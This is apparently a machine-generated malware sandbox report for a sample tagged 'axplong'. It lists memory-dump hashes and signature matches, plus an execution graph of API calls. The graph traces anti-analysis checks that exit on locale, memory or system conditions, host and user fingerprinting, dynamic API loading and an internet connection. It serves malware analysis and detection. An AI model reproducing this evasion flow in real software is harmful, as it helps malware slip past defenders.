                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 32384418-0
                                                                                                                                                                            • Opcode ID: ab0c93b59b942977e5e43664cb9a7dfecc84c33b09f0052b34c5795c5976f53a
                                                                                                                                                                            • Instruction ID: 9e7376365837027f396a92b91ea08b3586df3fa553e1f7bbf757129b45fc0b05
                                                                                                                                                                            • Opcode Fuzzy Hash: ab0c93b59b942977e5e43664cb9a7dfecc84c33b09f0052b34c5795c5976f53a
                                                                                                                                                                            • Instruction Fuzzy Hash: 6EA100B4A007559FDB21DBA4C9847AEB7F8FF15355F004229E826D7281EB30EA48CB95
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                            • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                                                                                            • Instruction ID: 071030fe98cceb0995570911c284f3a0e411328f213422cf9e07fbd71c60d080
                                                                                                                                                                            • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                                                                                            • Instruction Fuzzy Hash: B1B145329006459FDB15EF28C8C1BFEBBE1EF55348F1481AAE859EB241D6348E41CB78
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                                                            • Opcode ID: 6732d6fde827971c0f82e1fcbeed24fc761d38fe22feb62485f50b842837df8c
                                                                                                                                                                            • Instruction ID: cbf0d11e03c6220f9386c920b3f16ac99e128ab548ca6e5aa34a24b652add86d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6732d6fde827971c0f82e1fcbeed24fc761d38fe22feb62485f50b842837df8c
                                                                                                                                                                            • Instruction Fuzzy Hash: E0213171E012199FDF20EFA4DDC5ABEBBB8EF48714F100065F601A7251DB35AE41ABA1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: broken promise$future already retrieved$no state$promise already satisfied
                                                                                                                                                                            • API String ID: 0-3399861469
                                                                                                                                                                            • Opcode ID: 80c88ea41f47b87c9725c0a1567f53df56dec34ffc239e111f3f14e5dcfbae5b
                                                                                                                                                                            • Instruction ID: c32fe102795ee3ee14c48e7c9b1ce0366ed50a79fe32afaac3326d1fd859d43e
                                                                                                                                                                            • Opcode Fuzzy Hash: 80c88ea41f47b87c9725c0a1567f53df56dec34ffc239e111f3f14e5dcfbae5b
                                                                                                                                                                            • Instruction Fuzzy Hash: D221F6756016008FD728CF19C848B2EB7E5FF84729F048A1DE856CB7A0DB35AD84CB84

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:4.9%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:2.9%
                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                            Total number of Limit Nodes:29
                                                                                                                                                                            execution_graph 77182 771190 77189 7878e0 GetProcessHeap HeapAlloc GetComputerNameA 77182->77189 77184 7711cc 77185 77119e 77185->77184 77191 787850 GetProcessHeap HeapAlloc GetUserNameA 77185->77191 77187 7711b7 77187->77184 77188 7711c4 ExitProcess 77187->77188 77190 787939 77189->77190 77190->77185 77192 7878c3 77191->77192 77192->77187 77193 7869f0 77236 772260 77193->77236 77210 787850 3 API calls 77211 786a30 77210->77211 77212 7878e0 3 API calls 77211->77212 77213 786a43 77212->77213 77369 78a9b0 77213->77369 77215 786a64 77216 78a9b0 4 API calls 77215->77216 77217 786a6b 77216->77217 77218 78a9b0 4 API calls 77217->77218 77219 786a72 77218->77219 77220 78a9b0 4 API calls 77219->77220 77221 786a79 77220->77221 77222 78a9b0 4 API calls 77221->77222 77223 786a80 77222->77223 77377 78a8a0 77223->77377 77225 786b0c 77381 786920 GetSystemTime 77225->77381 77227 786a89 77227->77225 77229 786ac2 OpenEventA 77227->77229 77231 786ad9 77229->77231 77232 786af5 CloseHandle Sleep 77229->77232 77235 786ae1 CreateEventA 77231->77235 77234 786b0a 77232->77234 77234->77227 77235->77225 77579 7745c0 17 API calls 77236->77579 77238 772274 77239 7745c0 34 API calls 77238->77239 77240 77228d 77239->77240 77241 7745c0 34 API calls 77240->77241 77242 7722a6 77241->77242 77243 7745c0 34 API calls 77242->77243 77244 7722bf 77243->77244 77245 7745c0 34 API calls 77244->77245 77246 7722d8 77245->77246 77247 7745c0 34 API calls 77246->77247 77248 7722f1 77247->77248 77249 7745c0 34 API calls 77248->77249 77250 77230a 77249->77250 77251 7745c0 34 API calls 77250->77251 77252 772323 77251->77252 77253 7745c0 34 API calls 77252->77253 77254 77233c 77253->77254 77255 7745c0 34 API calls 77254->77255 77256 772355 77255->77256 77257 7745c0 34 API calls 77256->77257 77258 77236e 77257->77258 77259 7745c0 34 API calls 77258->77259 77260 772387 77259->77260 77261 7745c0 34 API calls 77260->77261 77262 7723a0 77261->77262 77263 7745c0 34 API calls 77262->77263 77264 7723b9 77263->77264 77265 7745c0 34 API calls 77264->77265 77266 7723d2 77265->77266 77267 7745c0 34 API calls 77266->77267 77268 7723eb 77267->77268 77269 7745c0 34 API calls 77268->77269 77270 772404 77269->77270 77271 7745c0 34 API calls 77270->77271 77272 77241d 77271->77272 77273 7745c0 34 API calls 77272->77273 77274 772436 77273->77274 77275 7745c0 34 API calls 77274->77275 77276 77244f 77275->77276 77277 7745c0 34 API calls 77276->77277 77278 772468 77277->77278 77279 7745c0 34 API calls 77278->77279 77280 772481 77279->77280 77281 7745c0 34 API calls 77280->77281 77282 77249a 77281->77282 77283 7745c0 34 API calls 77282->77283 77284 7724b3 77283->77284 77285 7745c0 34 API calls 77284->77285 77286 7724cc 77285->77286 77287 7745c0 34 API calls 77286->77287 77288 7724e5 77287->77288 77289 7745c0 34 API calls 77288->77289 77290 7724fe 77289->77290 77291 7745c0 34 API calls 77290->77291 77292 772517 77291->77292 77293 7745c0 34 API calls 77292->77293 77294 772530 77293->77294 77295 7745c0 34 API calls 77294->77295 77296 772549 77295->77296 77297 7745c0 34 API calls 77296->77297 77298 772562 77297->77298 77299 7745c0 34 API calls 77298->77299 77300 77257b 77299->77300 77301 7745c0 34 API calls 77300->77301 77302 772594 77301->77302 77303 7745c0 34 API calls 77302->77303 77304 7725ad 77303->77304 77305 7745c0 34 API calls 77304->77305 77306 7725c6 77305->77306 77307 7745c0 34 API calls 77306->77307 77308 7725df 77307->77308 77309 7745c0 34 API calls 77308->77309 77310 7725f8 77309->77310 77311 7745c0 34 API calls 77310->77311 77312 772611 77311->77312 77313 7745c0 34 API calls 77312->77313 77314 77262a 77313->77314 77315 7745c0 34 API calls 77314->77315 77316 772643 77315->77316 77317 7745c0 34 API calls 77316->77317 77318 77265c 77317->77318 77319 7745c0 34 API calls 77318->77319 77320 772675 77319->77320 77321 7745c0 34 API calls 77320->77321 77322 77268e 77321->77322 77323 789860 77322->77323 77583 789750 GetPEB 77323->77583 77325 789868 77326 78987a 77325->77326 77327 789a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 77325->77327 77330 78988c 21 API calls 77326->77330 77328 789b0d 77327->77328 77329 789af4 GetProcAddress 77327->77329 77331 789b46 77328->77331 77332 789b16 GetProcAddress GetProcAddress 77328->77332 77329->77328 77330->77327 77333 789b68 77331->77333 77334 789b4f GetProcAddress 77331->77334 77332->77331 77335 789b89 77333->77335 77336 789b71 GetProcAddress 77333->77336 77334->77333 77337 786a00 77335->77337 77338 789b92 GetProcAddress GetProcAddress 77335->77338 77336->77335 77339 78a740 77337->77339 77338->77337 77340 78a750 77339->77340 77341 786a0d 77340->77341 77342 78a77e lstrcpy 77340->77342 77343 7711d0 77341->77343 77342->77341 77344 7711e8 77343->77344 77345 771217 77344->77345 77346 77120f ExitProcess 77344->77346 77347 771160 GetSystemInfo 77345->77347 77348 771184 77347->77348 77349 77117c ExitProcess 77347->77349 77350 771110 GetCurrentProcess VirtualAllocExNuma 77348->77350 77351 771141 ExitProcess 77350->77351 77352 771149 77350->77352 77584 7710a0 VirtualAlloc 77352->77584 77355 771220 77588 7889b0 77355->77588 77358 771249 __aulldiv 77359 77129a 77358->77359 77360 771292 ExitProcess 77358->77360 77361 786770 GetUserDefaultLangID 77359->77361 77362 786792 77361->77362 77363 7867d3 GetUserDefaultLCID 77361->77363 77362->77363 77364 7867cb ExitProcess 77362->77364 77365 7867ad ExitProcess 77362->77365 77366 7867c1 ExitProcess 77362->77366 77367 7867a3 ExitProcess 77362->77367 77368 7867b7 ExitProcess 77362->77368 77363->77210 77590 78a710 77369->77590 77371 78a9c1 lstrlenA 77373 78a9e0 77371->77373 77372 78aa18 77591 78a7a0 77372->77591 77373->77372 77375 78a9fa lstrcpy lstrcatA 77373->77375 77375->77372 77376 78aa24 77376->77215 77379 78a8bb 77377->77379 77378 78a90b 77378->77227 77379->77378 77380 78a8f9 lstrcpy 77379->77380 77380->77378 77595 786820 77381->77595 77383 78698e 77384 786998 sscanf 77383->77384 77624 78a800 77384->77624 77386 7869aa SystemTimeToFileTime SystemTimeToFileTime 77387 7869ce 77386->77387 77388 7869e0 77386->77388 77387->77388 77389 7869d8 ExitProcess 77387->77389 77390 785b10 77388->77390 77391 785b1d 77390->77391 77392 78a740 lstrcpy 77391->77392 77393 785b2e 77392->77393 77626 78a820 lstrlenA 77393->77626 77396 78a820 2 API calls 77397 785b64 77396->77397 77398 78a820 2 API calls 77397->77398 77399 785b74 77398->77399 77630 786430 77399->77630 77402 78a820 2 API calls 77403 785b93 77402->77403 77404 78a820 2 API calls 77403->77404 77405 785ba0 77404->77405 77406 78a820 2 API calls 77405->77406 77407 785bad 77406->77407 77408 78a820 2 API calls 77407->77408 77409 785bf9 77408->77409 77639 7726a0 77409->77639 77417 785cc3 77418 786430 lstrcpy 77417->77418 77419 785cd5 77418->77419 77420 78a7a0 lstrcpy 77419->77420 77421 785cf2 77420->77421 77422 78a9b0 4 API calls 77421->77422 77423 785d0a 77422->77423 77424 78a8a0 lstrcpy 77423->77424 77425 785d16 77424->77425 77426 78a9b0 4 API calls 77425->77426 77427 785d3a 77426->77427 77428 78a8a0 lstrcpy 77427->77428 77429 785d46 77428->77429 77430 78a9b0 4 API calls 77429->77430 77431 785d6a 77430->77431 77432 78a8a0 lstrcpy 77431->77432 77433 785d76 77432->77433 77434 78a740 lstrcpy 77433->77434 77435 785d9e 77434->77435 78365 787500 GetWindowsDirectoryA 77435->78365 77438 78a7a0 lstrcpy 77439 785db8 77438->77439 78375 774880 77439->78375 77441 785dbe 78520 7817a0 77441->78520 77443 785dc6 77444 78a740 lstrcpy 77443->77444 77445 785de9 77444->77445 77446 771590 lstrcpy 77445->77446 77447 785dfd 77446->77447 78540 775960 77447->78540 77449 785e03 78686 781050 77449->78686 77451 785e0e 77452 78a740 lstrcpy 77451->77452 77453 785e32 77452->77453 77454 771590 lstrcpy 77453->77454 77455 785e46 77454->77455 77456 775960 39 API calls 77455->77456 77457 785e4c 77456->77457 78693 780d90 77457->78693 77459 785e57 77460 78a740 lstrcpy 77459->77460 77461 785e79 77460->77461 77462 771590 lstrcpy 77461->77462 77463 785e8d 77462->77463 77464 775960 39 API calls 77463->77464 77465 785e93 77464->77465 78703 780f40 77465->78703 77467 785e9e 77468 771590 lstrcpy 77467->77468 77469 785eb5 77468->77469 78711 781a10 77469->78711 77471 785eba 77472 78a740 lstrcpy 77471->77472 77473 785ed6 77472->77473 79055 774fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 77473->79055 77475 785edb 77476 771590 lstrcpy 77475->77476 77477 785f5b 77476->77477 79063 780740 77477->79063 77479 785f60 77480 78a740 lstrcpy 77479->77480 77481 785f86 77480->77481 77582 774697 77579->77582 77580 77474f 6 API calls 77580->77238 77581 7746ac 11 API calls 77581->77582 77582->77580 77582->77581 77583->77325 77585 7710c2 ctype 77584->77585 77586 7710fd 77585->77586 77587 7710e2 VirtualFree 77585->77587 77586->77355 77587->77586 77589 771233 GlobalMemoryStatusEx 77588->77589 77589->77358 77590->77371 77592 78a7c2 77591->77592 77593 78a7ec 77592->77593 77594 78a7da lstrcpy 77592->77594 77593->77376 77594->77593 77596 78a740 lstrcpy 77595->77596 77597 786833 77596->77597 77598 78a9b0 4 API calls 77597->77598 77599 786845 77598->77599 77600 78a8a0 lstrcpy 77599->77600 77601 78684e 77600->77601 77602 78a9b0 4 API calls 77601->77602 77603 786867 77602->77603 77604 78a8a0 lstrcpy 77603->77604 77605 786870 77604->77605 77606 78a9b0 4 API calls 77605->77606 77607 78688a 77606->77607 77608 78a8a0 lstrcpy 77607->77608 77609 786893 77608->77609 77610 78a9b0 4 API calls 77609->77610 77611 7868ac 77610->77611 77612 78a8a0 lstrcpy 77611->77612 77613 7868b5 77612->77613 77614 78a9b0 4 API calls 77613->77614 77615 7868cf 77614->77615 77616 78a8a0 lstrcpy 77615->77616 77617 7868d8 77616->77617 77618 78a9b0 4 API calls 77617->77618 77619 7868f3 77618->77619 77620 78a8a0 lstrcpy 77619->77620 77621 7868fc 77620->77621 77622 78a7a0 lstrcpy 77621->77622 77623 786910 77622->77623 77623->77383 77625 78a812 77624->77625 77625->77386 77627 78a83f 77626->77627 77628 785b54 77627->77628 77629 78a87b lstrcpy 77627->77629 77628->77396 77629->77628 77631 78a8a0 lstrcpy 77630->77631 77632 786443 77631->77632 77633 78a8a0 lstrcpy 77632->77633 77634 786455 77633->77634 77635 78a8a0 lstrcpy 77634->77635 77636 786467 77635->77636 77637 78a8a0 lstrcpy 77636->77637 77638 785b86 77637->77638 77638->77402 77640 7745c0 34 API calls 77639->77640 77641 7726b4 77640->77641 77642 7745c0 34 API calls 77641->77642 77643 7726d7 77642->77643 77644 7745c0 34 API calls 77643->77644 77645 7726f0 77644->77645 77646 7745c0 34 API calls 77645->77646 77647 772709 77646->77647 77648 7745c0 34 API calls 77647->77648 77649 772736 77648->77649 77650 7745c0 34 API calls 77649->77650 77651 77274f 77650->77651 77652 7745c0 34 API calls 77651->77652 77653 772768 77652->77653 77654 7745c0 34 API calls 77653->77654 77655 772795 77654->77655 77656 7745c0 34 API calls 77655->77656 77657 7727ae 77656->77657 77658 7745c0 34 API calls 77657->77658 77659 7727c7 77658->77659 77660 7745c0 34 API calls 77659->77660 77661 7727e0 77660->77661 77662 7745c0 34 API calls 77661->77662 77663 7727f9 77662->77663 77664 7745c0 34 API calls 77663->77664 77665 772812 77664->77665 77666 7745c0 34 API calls 77665->77666 77667 77282b 77666->77667 77668 7745c0 34 API calls 77667->77668 77669 772844 77668->77669 77670 7745c0 34 API calls 77669->77670 77671 77285d 77670->77671 77672 7745c0 34 API calls 77671->77672 77673 772876 77672->77673 77674 7745c0 34 API calls 77673->77674 77675 77288f 77674->77675 77676 7745c0 34 API calls 77675->77676 77677 7728a8 77676->77677 77678 7745c0 34 API calls 77677->77678 77679 7728c1 77678->77679 77680 7745c0 34 API calls 77679->77680 77681 7728da 77680->77681 77682 7745c0 34 API calls 77681->77682 77683 7728f3 77682->77683 77684 7745c0 34 API calls 77683->77684 77685 77290c 77684->77685 77686 7745c0 34 API calls 77685->77686 77687 772925 77686->77687 77688 7745c0 34 API calls 77687->77688 77689 77293e 77688->77689 77690 7745c0 34 API calls 77689->77690 77691 772957 77690->77691 77692 7745c0 34 API calls 77691->77692 77693 772970 77692->77693 77694 7745c0 34 API calls 77693->77694 77695 772989 77694->77695 77696 7745c0 34 API calls 77695->77696 77697 7729a2 77696->77697 77698 7745c0 34 API calls 77697->77698 77699 7729bb 77698->77699 77700 7745c0 34 API calls 77699->77700 77701 7729d4 77700->77701 77702 7745c0 34 API calls 77701->77702 77703 7729ed 77702->77703 77704 7745c0 34 API calls 77703->77704 77705 772a06 77704->77705 77706 7745c0 34 API calls 77705->77706 77707 772a1f 77706->77707 77708 7745c0 34 API calls 77707->77708 77709 772a38 77708->77709 77710 7745c0 34 API calls 77709->77710 77711 772a51 77710->77711 77712 7745c0 34 API calls 77711->77712 77713 772a6a 77712->77713 77714 7745c0 34 API calls 77713->77714 77715 772a83 77714->77715 77716 7745c0 34 API calls 77715->77716 77717 772a9c 77716->77717 77718 7745c0 34 API calls 77717->77718 77719 772ab5 77718->77719 77720 7745c0 34 API calls 77719->77720 77721 772ace 77720->77721 77722 7745c0 34 API calls 77721->77722 77723 772ae7 77722->77723 77724 7745c0 34 API calls 77723->77724 77725 772b00 77724->77725 77726 7745c0 34 API calls 77725->77726 77727 772b19 77726->77727 77728 7745c0 34 API calls 77727->77728 77729 772b32 77728->77729 77730 7745c0 34 API calls 77729->77730 77731 772b4b 77730->77731 77732 7745c0 34 API calls 77731->77732 77733 772b64 77732->77733 77734 7745c0 34 API calls 77733->77734 77735 772b7d 77734->77735 77736 7745c0 34 API calls 77735->77736 77737 772b96 77736->77737 77738 7745c0 34 API calls 77737->77738 77739 772baf 77738->77739 77740 7745c0 34 API calls 77739->77740 77741 772bc8 77740->77741 77742 7745c0 34 API calls 77741->77742 77743 772be1 77742->77743 77744 7745c0 34 API calls 77743->77744 77745 772bfa 77744->77745 77746 7745c0 34 API calls 77745->77746 77747 772c13 77746->77747 77748 7745c0 34 API calls 77747->77748 77749 772c2c 77748->77749 77750 7745c0 34 API calls 77749->77750 77751 772c45 77750->77751 77752 7745c0 34 API calls 77751->77752 77753 772c5e 77752->77753 77754 7745c0 34 API calls 77753->77754 77755 772c77 77754->77755 77756 7745c0 34 API calls 77755->77756 77757 772c90 77756->77757 77758 7745c0 34 API calls 77757->77758 77759 772ca9 77758->77759 77760 7745c0 34 API calls 77759->77760 77761 772cc2 77760->77761 77762 7745c0 34 API calls 77761->77762 77763 772cdb 77762->77763 77764 7745c0 34 API calls 77763->77764 77765 772cf4 77764->77765 77766 7745c0 34 API calls 77765->77766 77767 772d0d 77766->77767 77768 7745c0 34 API calls 77767->77768 77769 772d26 77768->77769 77770 7745c0 34 API calls 77769->77770 77771 772d3f 77770->77771 77772 7745c0 34 API calls 77771->77772 77773 772d58 77772->77773 77774 7745c0 34 API calls 77773->77774 77775 772d71 77774->77775 77776 7745c0 34 API calls 77775->77776 77777 772d8a 77776->77777 77778 7745c0 34 API calls 77777->77778 77779 772da3 77778->77779 77780 7745c0 34 API calls 77779->77780 77781 772dbc 77780->77781 77782 7745c0 34 API calls 77781->77782 77783 772dd5 77782->77783 77784 7745c0 34 API calls 77783->77784 77785 772dee 77784->77785 77786 7745c0 34 API calls 77785->77786 77787 772e07 77786->77787 77788 7745c0 34 API calls 77787->77788 77789 772e20 77788->77789 77790 7745c0 34 API calls 77789->77790 77791 772e39 77790->77791 77792 7745c0 34 API calls 77791->77792 77793 772e52 77792->77793 77794 7745c0 34 API calls 77793->77794 77795 772e6b 77794->77795 77796 7745c0 34 API calls 77795->77796 77797 772e84 77796->77797 77798 7745c0 34 API calls 77797->77798 77799 772e9d 77798->77799 77800 7745c0 34 API calls 77799->77800 77801 772eb6 77800->77801 77802 7745c0 34 API calls 77801->77802 77803 772ecf 77802->77803 77804 7745c0 34 API calls 77803->77804 77805 772ee8 77804->77805 77806 7745c0 34 API calls 77805->77806 77807 772f01 77806->77807 77808 7745c0 34 API calls 77807->77808 77809 772f1a 77808->77809 77810 7745c0 34 API calls 77809->77810 77811 772f33 77810->77811 77812 7745c0 34 API calls 77811->77812 77813 772f4c 77812->77813 77814 7745c0 34 API calls 77813->77814 77815 772f65 77814->77815 77816 7745c0 34 API calls 77815->77816 77817 772f7e 77816->77817 77818 7745c0 34 API calls 77817->77818 77819 772f97 77818->77819 77820 7745c0 34 API calls 77819->77820 77821 772fb0 77820->77821 77822 7745c0 34 API calls 77821->77822 77823 772fc9 77822->77823 77824 7745c0 34 API calls 77823->77824 77825 772fe2 77824->77825 77826 7745c0 34 API calls 77825->77826 77827 772ffb 77826->77827 77828 7745c0 34 API calls 77827->77828 77829 773014 77828->77829 77830 7745c0 34 API calls 77829->77830 77831 77302d 77830->77831 77832 7745c0 34 API calls 77831->77832 77833 773046 77832->77833 77834 7745c0 34 API calls 77833->77834 77835 77305f 77834->77835 77836 7745c0 34 API calls 77835->77836 77837 773078 77836->77837 77838 7745c0 34 API calls 77837->77838 77839 773091 77838->77839 77840 7745c0 34 API calls 77839->77840 77841 7730aa 77840->77841 77842 7745c0 34 API calls 77841->77842 77843 7730c3 77842->77843 77844 7745c0 34 API calls 77843->77844 77845 7730dc 77844->77845 77846 7745c0 34 API calls 77845->77846 77847 7730f5 77846->77847 77848 7745c0 34 API calls 77847->77848 77849 77310e 77848->77849 77850 7745c0 34 API calls 77849->77850 77851 773127 77850->77851 77852 7745c0 34 API calls 77851->77852 77853 773140 77852->77853 77854 7745c0 34 API calls 77853->77854 77855 773159 77854->77855 77856 7745c0 34 API calls 77855->77856 77857 773172 77856->77857 77858 7745c0 34 API calls 77857->77858 77859 77318b 77858->77859 77860 7745c0 34 API calls 77859->77860 77861 7731a4 77860->77861 77862 7745c0 34 API calls 77861->77862 77863 7731bd 77862->77863 77864 7745c0 34 API calls 77863->77864 77865 7731d6 77864->77865 77866 7745c0 34 API calls 77865->77866 77867 7731ef 77866->77867 77868 7745c0 34 API calls 77867->77868 77869 773208 77868->77869 77870 7745c0 34 API calls 77869->77870 77871 773221 77870->77871 77872 7745c0 34 API calls 77871->77872 77873 77323a 77872->77873 77874 7745c0 34 API calls 77873->77874 77875 773253 77874->77875 77876 7745c0 34 API calls 77875->77876 77877 77326c 77876->77877 77878 7745c0 34 API calls 77877->77878 77879 773285 77878->77879 77880 7745c0 34 API calls 77879->77880 77881 77329e 77880->77881 77882 7745c0 34 API calls 77881->77882 77883 7732b7 77882->77883 77884 7745c0 34 API calls 77883->77884 77885 7732d0 77884->77885 77886 7745c0 34 API calls 77885->77886 77887 7732e9 77886->77887 77888 7745c0 34 API calls 77887->77888 77889 773302 77888->77889 77890 7745c0 34 API calls 77889->77890 77891 77331b 77890->77891 77892 7745c0 34 API calls 77891->77892 77893 773334 77892->77893 77894 7745c0 34 API calls 77893->77894 77895 77334d 77894->77895 77896 7745c0 34 API calls 77895->77896 77897 773366 77896->77897 77898 7745c0 34 API calls 77897->77898 77899 77337f 77898->77899 77900 7745c0 34 API calls 77899->77900 77901 773398 77900->77901 77902 7745c0 34 API calls 77901->77902 77903 7733b1 77902->77903 77904 7745c0 34 API calls 77903->77904 77905 7733ca 77904->77905 77906 7745c0 34 API calls 77905->77906 77907 7733e3 77906->77907 77908 7745c0 34 API calls 77907->77908 77909 7733fc 77908->77909 77910 7745c0 34 API calls 77909->77910 77911 773415 77910->77911 77912 7745c0 34 API calls 77911->77912 77913 77342e 77912->77913 77914 7745c0 34 API calls 77913->77914 77915 773447 77914->77915 77916 7745c0 34 API calls 77915->77916 77917 773460 77916->77917 77918 7745c0 34 API calls 77917->77918 77919 773479 77918->77919 77920 7745c0 34 API calls 77919->77920 77921 773492 77920->77921 77922 7745c0 34 API calls 77921->77922 77923 7734ab 77922->77923 77924 7745c0 34 API calls 77923->77924 77925 7734c4 77924->77925 77926 7745c0 34 API calls 77925->77926 77927 7734dd 77926->77927 77928 7745c0 34 API calls 77927->77928 77929 7734f6 77928->77929 77930 7745c0 34 API calls 77929->77930 77931 77350f 77930->77931 77932 7745c0 34 API calls 77931->77932 77933 773528 77932->77933 77934 7745c0 34 API calls 77933->77934 77935 773541 77934->77935 77936 7745c0 34 API calls 77935->77936 77937 77355a 77936->77937 77938 7745c0 34 API calls 77937->77938 77939 773573 